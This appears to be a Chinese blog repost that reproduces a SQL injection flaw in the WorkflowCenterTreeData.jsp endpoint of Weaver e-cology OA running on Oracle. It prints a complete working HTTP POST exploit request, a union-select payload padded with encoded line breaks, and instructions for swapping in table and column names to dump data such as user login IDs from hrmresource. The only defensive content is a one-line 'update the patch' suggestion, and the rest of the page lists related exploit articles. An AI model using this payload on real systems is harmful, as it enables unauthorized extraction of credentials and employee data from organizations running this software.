泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

最新推荐文章于 2023-03-20 09:58:49 发布
最新推荐文章于 2023-03-20 09:58:49 发布
阅读量1.4k 收藏
点赞数
分类专栏: 漏洞复现 泛微oa 文章标签: 泛微 sql注入
原文链接:https://blog.csdn.net/zycdn/article/details/102494037
版权

漏洞描述

泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞

影响范围

使用oracle数据库的泛微 e-cology OA 系统

漏洞复现

POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1

formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

修改NULL后\的字段为要查询的字段名,修改from后的字段为要查询的表名

存在漏洞

修改后的示例

无漏洞

不存在注入漏洞

本人测试

有漏洞

有漏洞
查询登录ID
select NULL,loginid from hrmresource貌似只能挨个字段查询 lastname,mobile

数据字典

下载地址

修复建议

更新补丁

Seizerz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微e-cology8前台sql注入POC
afei001
04-12 2368
目录 1.前言 2.POC 1.前言 泛微ecology8是一款OA办公产品。但其版本ecology8存在前台SQL注入。可获取系统管理员密码hash。该该漏洞是在2021年04月08日,HW第一天爆出。 泛微官网:https://www.weaver.com.c...
漏洞复现泛微OA E-Cology Browser SQL注入漏洞
最新发布
晚风不及你
05-16 559
泛微OA E-Cology browser存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
漏洞预警】泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库)
Summer's blog
05-13 7581
目录 0x01 漏洞描述 0x02 漏洞威胁等级 0x03 漏洞成因 0x04 漏洞复现 0x05 修复建议 0x06 免责申明 0x01 漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 0x02 漏洞威胁等级 高危 影响范围 所有使用Oracle数据库的泛微服务...
oracle 权限问题9017,泛微OA 曝出WorkflowCenterTreeData接口注入漏洞(限oracle数据库)
weixin_39531992的博客
04-11 761
玄蜂安全团队10月10日了解到。泛微OA又双叒叕曝出了一个高危漏洞。其存在点是企业使用Oracle数据库在其系统的WorkflowCenterTreeData接口处会因为内置SQL语句拼接不严导致的一个注入漏洞。这个注入漏洞可以直接导致系统用户数据泄漏,篡改网页内容等一系列重大危害。建议用户,尽快升级到OA最新系统。前不久,泛微OA爆出了RCE(远程代码执行)漏洞,造成了较大影响,希望广大用户重视...
漏洞预警】泛微E-cology OA系统SQL注入漏洞
NOSEC2019的博客
10-10 2853
2019年10月,白帽汇安全研究院观测外网出现泛微办公软件的SQL注入漏洞,攻击者可在未经身份验证的情况下进行攻击,获得系统敏感数据。该漏洞目前属于0day,所有使用了Oracle数据库的泛微网站都有可能受到影响,且利用难度低,危害大(可获取密码等敏感信息),预计会对泛微的主要服务地区——中国市场产生一定冲击。 该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Orac...
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 7797
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
泛微OA WorkflowCenterTreeData接口注入复现(仅限oracle数据库)
weixin_43815032的博客
10-11 946
背景 2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的,任意攻击者都可借SQL语句拼接时机注入恶意payload,造成SQL注入攻击。 漏洞描述 ...
泛微OA e-cology8最新h5补丁
06-01
【标题】"泛微OA e-cology8最新h5补丁"所指的是一款针对泛微协同办公系统(e-cology8)的HTML5补丁,主要用于解决或优化系统中的Web界面在现代浏览器上的显示和交互问题。泛微OA是企业级的协同办公自动化软件,它集成...
泛微OA e-cology 8 最新webservice接口文档
12-11
泛微OA e-cology 8 最新webservice接口文档摘要 泛微OA e-cology 8 最新webservice接口文档提供了一系列的webservice接口,用于对系统中的文档进行操作,包括创建文档、删除文档、更新文档、查看文档等。这些接口...
泛微OA E-cology字段联动.rar
09-09
在实际操作中,开发人员需要具备一定的SQL知识,理解如何编写高效的查询和更新语句,同时熟悉泛微OA E-cology的开发接口和规则。文档“泛微OA E-cology字段联动.docx”可能包含了具体的配置示例和步骤,对于想要实施...
泛微OA 9.0 e-cology9.0 数据字典
07-06
版本升级.zip 表单建模.zip 财务管理.zip 车辆管理.zip 短信模块.zip 工作流程.zip 工作微博.zip 公文管理.zip 会议管理.zip 即时通讯-EMESSAGE.zip 集成模块.zip 客户管理.zip 门户管理.zip ...workflow
泛微ecology E8协同办公系统详细的表结构(OA数据字典)
10-11
本文件包括ecology所有的数据库表的结构,例如工作流引擎常用的表:workflow_base 工作流信息表 workflow_bill 工作流单据信息表 workflow_billfield 工作流单据字段表 workflow_flownode 工作流节点信息表 workflow_nodelink 工作流出口信息表 workflow_nodebase 工作流节点基本信息表 workflow_nownode 工作流当前节点信息表 workflow_nodegroup 工作流节点操作组表 workflow_groupdetail 工作流程节点操作组操作人明细表 workflow_requestbase 工作流请求基本信息表 workflow_requestLo g 工作流请求签字日志表 workflow_requestViewLog 工作流请求查看日志 workflow_currentoperator 工作流当前操作人信息表 workflow_browserurl 工作流自定义浏览按钮信息表 workflow_selectitem 工作流下拉选择框选择项信息表
泛微ecology9数据字典明细
06-30
泛微ecology9数据字典明细
泛微ecology数据字典明细
11-21
泛微ecology7所有数据库字段表结构详细说明文档,
泛微 OA E-cology 数据字典
03-18
泛微OA E-cology 数据字典资料
泛微OA的常用表结构
12-03
本文件包括ecology常用的数据库表结构,例如工作流引擎常用的表:workflow_base 工作流信息表 workflow_bill 工作流单据信息表 workflow_billfield 工作流单据字段表 workflow_flownode 工作流节点信息表 workflow_nodelink 工作流出口信息表 workflow_nodebase 工作流节点基本信息表 workflow_nownode 工作流当前节点信息表 workflow_nodegroup 工作流节点操作组表 workflow_groupdetail 工作流程节点操作组操作人明细表 workflow_requestbase 工作流请求基本信息表 workflow_requestLog 工作流请求签字日志表 workflow_requestViewLog 工作流请求查看日志 workflow_currentoperator 工作流当前操作人信息表 workflow_browserurl 工作流自定义浏览按钮信息表 workflow_selectitem 工作流下拉选择框选择项信息表
国产软件漏洞分析系列2:泛微OA e-cology 8/9 安全补丁分析之file
重新启程
10-18 1505
首先我们看一下FileManage类 package ecology.classbean.weaver.file; public class FileManage 关注到增加了一个import类FileType 其中主要修改的函数为copy函数,显然这个函数造成了漏洞 public static void copy(String srcfile, String destfil...
[HW必备]|蓝队防守必须排查的57个安全漏洞与解决方案
03-18 5198
一、OA系统 二、E-mail 三、Web中间件 四、源代码管理 五、项目管理系统 六、开源运维监控 七、堡垒机
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值